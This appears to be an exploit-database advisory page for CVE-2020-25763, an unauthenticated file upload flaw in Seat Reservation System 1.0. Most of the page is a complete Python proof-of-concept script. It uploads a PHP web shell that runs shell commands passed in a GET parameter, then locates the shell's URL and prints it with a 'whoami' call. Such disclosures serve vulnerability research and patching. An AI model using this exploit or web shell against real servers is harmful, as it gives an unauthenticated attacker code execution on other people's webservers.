Seat Reservation System 1.0 Shell Upload

2020.09.23

Credit: Rahul Ramkumar

Risk: High

Local: No

Remote: Yes

CVE: CVE-2020-25763

CWE: CWE-264

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Seat Reservation System version 1.0 suffers from an Unauthenticated File
Upload Vulnerability allowing Remote Attackers to gain Remote Code
Execution (RCE) on the Hosting Webserver via uploading PHP files.

Vendor Homepage: www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip

Author: Rahul Ramkumar

Date: 2020-09-16

CVE: CVE-2020-25763

PoC:
-------
# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code
Execution
import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string

def print_usage(STRING):
    return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
        print print_usage("Example:\t python %s '
https://192.168.1.72:443/seat_reservation/'" % sys.argv[0])
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
    UPLOAD_URL = SERVER_URL + UPLOAD_DIR
    random = ''.join([random.choice(string.ascii_letters + string.digits)
for n in xrange(16)])
    webshell = random+'.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)
    image     = {
                'cover':
                  (
                    webshell,
                    '<?php echo shell_exec($_GET["d3crypt"]); ?>',
                    'application/php',
                    {'Content-Disposition': 'form-data'}
                  )
              }
    fdata   = {'id':
'','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'}
    r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False)
    r2 = s.get(SERVER_URL, verify=False)
    response_page = r2.content.decode("utf-8")
    parser = etree.HTMLParser()
    tree = etree.parse(StringIO(response_page), parser=parser)
    def get_links(tree):
        refs = tree.xpath("//img")
        links = [link.get('src', '') for link in refs]
        return [l for l in links]

    links = get_links(tree)
    print('Access your webshell at: ')
    for link in links:
        if webshell in link:
            print(SERVER_URL + link+'?d3crypt=whoami')

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Seat Reservation System 1.0 Shell Upload

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.